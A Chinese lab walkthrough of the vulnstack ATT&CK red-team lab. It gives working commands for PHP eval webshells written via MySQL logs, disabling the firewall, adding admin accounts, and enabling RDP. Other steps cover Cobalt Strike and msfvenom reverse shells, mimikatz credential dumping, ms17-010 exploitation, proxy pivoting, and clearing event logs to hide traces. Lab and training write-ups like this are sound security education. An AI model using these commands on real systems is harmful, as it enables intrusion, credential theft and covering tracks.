ATTCK实战系列——红队实战(一)

文章目录

  • 网络拓扑
  • 环境搭建
  • 外网渗透
    • 信息收集
      • 端口扫描
      • 目录扫描
    • 漏洞利用
      • phpmyadmin拿shell
        • general_log_file写一句话
        • 蚁剑连接
      • 网站后台拿shell
      • 关闭防火墙
      • 新建用户,开启3389
  • 内网渗透
    • (一)CS
      • CS木马上线
      • 信息收集
        • hashdump
        • Mimikatz抓取明文密码
      • 权限提升
      • 横向移动
      • CS痕迹清楚
    • (二)MSF
      • msf木马上线
      • 信息收集
      • 横向移动
        • 添加路由、挂上Socks4a代理
        • nmap漏洞扫描
        • ms17-010命令执行
        • rdesktop远程连接

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

开机密码:hongrisec@2019

进入环境后要先改系统密码

网络拓扑

image-20231116210021237

环境搭建

先将 server2003 和 server2008 两台主机都设置为自定义VMnet1

VMnet1仅主机模式的子网地址改为192.168.52.0

image-20231116205828798

image-20231116205910294

Win7添加一块网卡,一块是NAT模式,另一块是VMnet1仅主机模式

image-20231116210210767

IP地址:

win7:  192.168.52.128           10.9.75.6
2008:  192.168.52.138
2003:  192.168.52.141

image-20231116211457145

启动Win7的Web服务

image-20231116214619121

image-20231116214630456

外网渗透

信息收集

端口扫描

nmap --min-rate 1000 10.9.75.6

image-20231116220159122

sudo nmap -sT -sV  -sC -O -p 80,3306 10.9.75.6

image-20231116220453013

sudo nmap --script=vuln -p 3306,80 10.9.75.6

image-20231116220724223

目录扫描

御剑后台扫描工具

image-20231116224108915

访问80端口

image-20231116222449223

知道了网站的绝对路径C:/phpStudy/WWW

image-20231116220914234

存在root:root弱口令

image-20231116220938300

访问phpMyAdmin

image-20231116221034913

漏洞利用

phpmyadmin拿shell

general_log_file写一句话

尝试能不能通过这个数据库管理页面写一句话,拿WebShell

SHOW GLOBAL VARIABLES LIKE "%secure%"

image-20231116221316417

说明不能通过into outfile来写一句话

查看general_log是否开启

show global variables like "%general%"

image-20231116221541129

开启general_log

set global general_log="on";

再次查询,此时日志功能就开启了

image-20231116221634860

可以通过general_log_file指定为一个php后缀的文件,来写查询语句

set global general_log_file="C:\\phpstudy\\www\\shell.php";
select "<?php  @eval($_REQUEST[6868])?>";

image-20231116221953362

蚁剑连接

image-20231116222258539

进入文件管理,发现一个beifen.rar备份文件

image-20231116224229009

下载到kali本地,然后解压

rar x beifen.rar

rar

解压:rar x FileName.rar

压缩:rar e FileName.rar

image-20231116224554249

网站后台拿shell

http://10.9.75.6/yxcms/

image-20231116225127725

http://10.9.75.6/yxcms/index.php?r=admin

登陆网站后台

image-20231116225248366

新建前台模板,写一句话

image-20231116225432087

image-20231116225452192

<?php @eval($_POST['cmd'])?>; 

image-20231116230608453

在拿到的备份文件中,找到模板的上传点

image-20231116225907521

http://10.9.75.6/yxcms/protected/apps/default/view/default/

image-20231116230055297

访问webshell.php

http://10.9.75.6/yxcms/protected/apps/default/view/default/webshell.php

image-20231116230524622

关闭防火墙

netsh advfirewall show allprofile state     (显示防火墙)netsh advfirewall set allprofiles state off (关闭防火墙)

image-20231117132031804

新建用户,开启3389

net user saury 123.com /add # 添加账户密码
net localgroup administrators saury /add  # 添加为管理员权限

image-20231117132145236

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
# 开启3389端口

如果防火墙没关,rdp会登录失败

image-20231117132242981

内网渗透

(一)CS

CS木马上线

kali既充当CS服务端,也充当CS客户端

启动服务端

image-20231117133052571

客户端连接

image-20231117133157944

开启监听

image-20231117133251390

生成木马

image-20231117133321801

image-20231117133342718

点击Generate生成木马artifact_x64.exe,保存到 一个位置

木马上线

image-20231117133551853

image-20231117133704737

执行完木马文件后,CS木马就上线了

image-20231117133734929

目标上线之后,我们第一步首先要做的就是先将睡眠时间设置为0

image-20231117134908657

在会话交互框中输入命令:sleep 0,将睡眠时间设置为0

image-20231117135003535

在会话交互框中输入shell whoami可以瞬间得到如下所示的回显,说明睡眠时间设置为0完成

image-20231117135042657

信息收集

一些CS内网信息收集的命令

shell whoami                //显示administrator权限
shell systeminfo            //查看系统信息
shell ipconfig /all         //查看是否存在域shell net time /domain          //获取当前域控制器的时间 输入该命令可能存在如下三种情况:存在域,当前用户不是域用户;存在域,当前用户是域用户;不存在域。shell net view /domain      //查看所有域shell nbtbios               //快速探测内网shell net group "domain computers" /domain  //查看域控制器主机名shell nltest /domain_trusts //查看域信任关系shell net accounts /domain  //查看域内账号密码信息shell nltest /dclist:hacker //查看当前域的域控制器
shell net group "Domain Controllers" /domain        //获取域控制器列表
shell net group "Domain Admins" /domain             //获取域管理员列表
shell Tasklist /v            //列出进程和进程用户
shell systeminfo   

image-20231117142524768

image-20231117142818741

查看域中的机器

image-20231117142928435

hashdump

image-20231117143044466

image-20231117143026831

Mimikatz抓取明文密码

image-20231117143107613

或者直接输入命令也可以执行logonpasswords

image-20231117143230272

权限提升

利用ms15-051

image-20231117143914090

image-20231117143946074

将win7提成SYSTEM权限

横向移动

通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机

新建一个SMB监听器

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 psexecStageless Payload上线

image-20231117144046566

image-20231117144320333

拿下域控 主机

image-20231117144353531

看到∞∞这个字符 ,这就是派生的SMB Beacon

查看其IP地址

image-20231117144708264

再次通过拿下的域控拿下其他域成员机

image-20231117144435804

image-20231117144514033

image-20231117144522649

image-20231117144739019

横向成功!!!

CS痕迹清楚

根据入侵的路径依次删除上传的工具、删除Web日志、FTP日志等。

清除安全日志

shell wevtutil cl Security

清除系统日志,

shell wevtutil cl System

清除应用日志

shell wevtutil cl Application

清除启动日志

shell wevtutil cl Setup

清除RDP登录日志

shell wevtutil epl Security C:\Windows\System32\winevt\Logs\Security_new.evtx /q:"*[EventData[(Data[@Name='IpAddress']!='127.0.0.1')]]" /ow:true 

删除防火墙日志

shell del C:\Windows\System32\LogFiles\Firewall\pfirewall.log

删除PowerShell执行历史记录

shell del 
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

(二)MSF

msf木马上线

制作msf木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your-IP LPORT=your-PORT -f exe -o /home/kali/tmp/shell.exe

image-20231117152202589

开启msf监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.75.3
set lport 4567
run

通过蚁剑将生成的木马上传并运行

image-20231117152740528

木马成功上线,进行system提权

image-20231117152837225

信息收集

首先获取目标主机的shell

image-20231117152945711

出现乱码,可以使用chcp 65001解决乱码问题

查看路由表

route print

image-20231117153317504

可以看出内网网段是192.168.52.0/24

查看系统信息

systeminfo

image-20231117154912163

image-20231117154958667

查看是否在域内

ipconfig /all

image-20231117153434469

net view /domain  #查询当前主机是否加入域,如果加入则列出域名

image-20231117153639092

net view //查看域内主机

image-20231117154648700

image-20231117155112423

得到域内其他主机地址

  • OWA:192.168.52.138
  • ROOT-TVI862UBEH:192.168.52.141

查看域内用户

net user /domain

获取主机用户密码哈希

hashdump

image-20231117155419379

用户哈希数据的输出格式为:

用户名:SID:LM哈希:NTLM哈希:::

image-20231117160104658

这是因为当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,需要修改注册表等用户重新登录后才能成功抓取。

MSF使用_MSF中kiwi(mimikatz)模块的使用

尝试抓取域内的账号密码:利用 msf 的 kiwi 模块

load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用

注意执行需要system权限

creds_all         #列举所有凭据
creds_kerberos    #列举域内账号密码

横向移动

为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Windows7)的meterpreter会话来传递,需要建立socks反向代理。

注:添加路由一定要在挂代理之前,因为代理需要用到路由功能

添加路由、挂上Socks4a代理

使用 msf+proxychains 搭建socks4a隧道,设置内网路由

run autoroute -s 192.168.52.0/24  # 添加内网的路由
run autoroute -p  # 查看路由

image-20231117162817587

暂时把会话挂起来background

use auxiliary/server/socks_proxy    //使用socks代理set SRVHOST 10.9.75.3        //MSF本机的IP地址set VERSION 4a                      //设置socks代理的版本exploit            //开始代理

image-20231117163312002

然后在 proxychains 的配置文件 /etc/proxychains4.conf,添加Kali本机的1080端口:

sudo vim /etc/proxychains4.conf 

image-20231117163513812

image-20231117163500181

然后执行命令时,前面加上 proxychains 即可

image-20231117163748098

nmap漏洞扫描
proxychains nmap --script=vuln 192.168.52.141

image-20231117171504026

ms17-010命令执行

知道了目标主机中存在一些漏洞:MS08-067、MS17-010等等,我们就可以用MS17-010的EXP来拿下目标主机,MS17-010的EXP打不了,它这个漏洞有很多莫名其妙的问题,很多其它的因素会导致各种各样的问题出现,打不了并不代表这个漏洞利用不了,有别的玩法,同样也是用MS17-010,MS17-010这个漏洞不光是可以用来拿权限,我们还可以用它来干其它的操作,比如说我们可以用这个漏洞来添加一个账户,因此我们需要用到对应的一个模块,在kali的具有MSF的那个终端中输入命令:这个模块可以在MSF中输入search ms17-010来搜索到,输入完命令之后,会出现很多模块

image-20231117165747432

set rhosts 192.168.52.141        //设置IP地址为目标主机的IP地址set COMMAND net user hack 123.com /add    //设置要添加的账号和密码,密码在设置的时候要注意:这里的密码设置有一个策略的问题存在,所以我们在设置密码的时候需要搞得复杂一点,不然过不了exploit        //执行

得到以下的结果,说明执行成功

image-20231117165716050

继续执行,将创建的hack用户添加到管理员组

set command net localgroup administrators hack /add
exploit

image-20231117170031190

查看用户是否添加到管理员组里面

set command net localgroup administrators

image-20231117170149311

开启3389

因为开启3389端口命令中有两个双引号,如果整条命令外面不用单引号扩一下或者用双引号扩了,会出现一些符号闭合上的问题

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

image-20231117173256819

rdesktop远程连接

安装rdesktop

sudo apt install rdesktop
proxychains rdesktop 192.168.52.141

image-20231117173754393

image-20231117173835110

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/156351.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

姓氏情侣家庭亲子谐音顽梗头像分销流量主微信抖音小程序开发

姓氏情侣家庭亲子谐音顽梗头像分销流量主微信抖音小程序开发 姓氏情侣头像&#xff1a;提供各种姓氏的情侣头像模板&#xff0c;用户可根据自己的姓氏选择合适的头像进行定制。 家庭头像&#xff1a;为家庭成员提供多种形式的头像模板&#xff0c;让用户可以选择合适的家庭头像…

趣学python编程(七、实现个小网站如此简单 web.py使用介绍)

这里先拿一个小网站的例子来举例&#xff0c;保持好奇心就可以了。因为兴趣才是最好的老师&#xff0c;它能激发人内在的行动力。这里介绍个使用web.py轻量级框架实现的一个小网站&#xff0c;可以看到实现个小网站并不难。python都能用来干什么&#xff1f;那么网站就是它众多…

56、修改Integer缓存上限

参考视频&#xff1a; https://www.bilibili.com/video/BV13u4y1w7tb/?spm_id_from333.999.0.0&vd_sourcebbef52ca6b7ac46d36af19295c565917 第一步&#xff1a; 第二步&#xff1a; 第三步&#xff1a;修改Integer缓存上限 运行代码 Testpublic void integerTest(…

【高级网络程序设计】Week2-3 HTML

一、The Basics 1. HTML&HTML file HTMLMarkup languageHyper Text Markup LanguageHTML fileText file with markup tags.htm/.html extension Create an html file Open an editor Type: <html><head><titile><body> Save it as .html Open i…

C++二分查找算法:132 模式解法三枚举1

本文涉及的基础知识点 二分查找算法合集 本题不同解法 包括题目及代码C二分查找算法&#xff1a;132 模式解法一枚举3C二分查找算法&#xff1a;132 模式解法二枚举2代码最简洁C二分查找算法&#xff1a;132 模式解法三枚举1性能最佳C单调向量算法&#xff1a;132 模式解法三…

关于 Git 你了解多少?

1. 什么是Git? Git 是一个版本控制系统&#xff0c;由林纳斯托瓦兹创建。它旨在管理项目代码的更改&#xff0c;以便团队成员可以协作开发和维护代码库。Git 可以让用户跟踪代码的更改、回滚错误的更改、合并代码等。Git 还具有分支和标签的功能&#xff0c;使得团队成员可以在…

人工智能时代:深入了解与学以致用的智能科技

目录 前言人工智能的领域1. 医疗健康2. 交通与智能驾驶3. 教育领域4. 金融与人工智能5. 制造业与自动化 人工智能的应用1. 智能手机与语音助手2. 智能家居系统3. 自动驾驶汽车4. 医疗诊断与治疗5. 金融风控与预测分析 对人工智能的看法1. 科技的利弊2. 伦理和隐私问题3. 人工智…

中国毫米波雷达产业分析1——毫米波雷达行业概述

一、毫米波雷达简介 &#xff08;一&#xff09;产品定义 雷达是英文Radar的音译&#xff0c;源于Radio Detection and Ranging的缩写&#xff0c;原意是“无线电探测和测距”&#xff0c;即用无线电方法发现目标并测定它们在空间的位置。毫米波雷达是指一种工作在毫米波频段的…

过了那么多1024节才知道……

各位大佬好啊&#xff0c;相信程序员们都知道1024节&#xff0c;那么咱程序员一般会采取什么样的方式来度过程序员节呢&#xff1f;那我们就继续往下看哦&#xff0c;小编包您满意&#xff01; 先来了解一下历史吧&#xff01;1024节的起源可以追溯到2009年&#xff0c;当时俄…

如何让bug远离你?

想让bug远离你&#xff0c;当然是靠佛祖保佑~ /** *************************************************************************** ******************** ********************* ******************** COPYRIGHT INFORMATION *…

股票统计信息(七)

7-统计信息 文章目录 7-统计信息一. 股票周级别统计信息二. 查询可支持的所有的股票资金类型三. 股票图形统计信息四. 查询当前用户自选表里面最近十天的交易信息五. 查看天/星期范围统计的历史记录六. 查看最近多少天某个属性的涨跌幅度值 一. 股票周级别统计信息 接口描述: …

Redis:抢单预热

前言 在当今的互联网时代&#xff0c;抢单活动已经成为了电商平台、外卖平台等各种电子商务平台中常见的营销手段。通过抢单活动&#xff0c;商家可以吸引大量用户参与&#xff0c;从而提高销量和知名度。然而&#xff0c;抢单活动所带来的高并发请求往往会给系统带来巨大的压…

linux:查看文件前100行和后100行

查看文件中的前100行 head -n 100 文件名查看文件中的后100行 tail -n 100 文件名

Fiddler抓包看这篇就够了:fiddler设置弱网测试

弱网测试 概念&#xff1a;弱网看字面意思就是网络比较弱&#xff0c;我们通称为信号差&#xff0c;网速慢。 意义&#xff1a;模拟在地铁、隧道、电梯和车库等场景下使用APP &#xff0c;网络会出现延时、中断和超时等情况。 自动化测试相关教程推荐&#xff1a; 2023最新自…

【LeetCode刷题-数组】--18.四数之和

18.四数之和 方法&#xff1a;排序双指针 先对数组进行排序&#xff0c;使用两重循环分别枚举前两个数&#xff0c;然后在两重循环枚举到的数之后使用双指针枚举剩下的两个数 class Solution {public List<List<Integer>> fourSum(int[] nums, int target) {List…

python实战—核心基础3(RGB模式颜色转换器) lv1

目录 一、核心代码解释 二、代码 三、运行截图 一、核心代码解释 1、hex() 函数 参数说明&#xff1a; x -- 10进制整数 返回值&#xff1a; 返回16进制数&#xff0c;以字符串形式表示。 实例&#xff1a; 以下实例展示了 hex 的使用方法&#xff1a; >>>h…

第一次性能测试懵逼了

最近&#xff0c;公司领导让我做下性能方面的竞品对比&#xff0c;作为一个性能测试小白的我&#xff0c;突然接到这样的任务&#xff0c;下意识发出大大的疑问。 整理好心情&#xff0c;内心想着“领导一定是为了考验我&#xff0c;才给我这个任务的”&#xff0c;开始了这一次…

Mysql之聚合函数

Mysql之聚合函数 什么是聚合函数常见的聚合函数GROUP BYWITH ROLLUPHAVINGHAVING与WHERE的对比 总结SQL底层原理 什么是聚合函数 对一组数据进行汇总的函数&#xff0c;但是还是返回一个结果 聚合函数也叫聚集&#xff0c;分组函数 常见的聚合函数 1.AVG(): 求平均值 2.SUM() :…

每日一练 | 华为认证真题练习Day134

1、开启标准STP协议的交换机可能存在哪些端口状态&#xff1f;&#xff08;多选&#xff09; A. Discarding B. Listening C. Disabled D. Forwarding 2、下列路由协议中优先级最高的是&#xff1f; A. Direct B. RIP C. OSPF D. Static 3、参考如图所示的输出结果&…

【双指针】盛水最多的容器

盛水最多的容器 文章目录 盛水最多的容器题目描述算法原理思路一思路二 代码实现Java代码实现C代码实现 题目描述 给定一个长度为 n 的整数数组 height 。有 n 条垂线&#xff0c;第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线&#xff0c;使得它们与…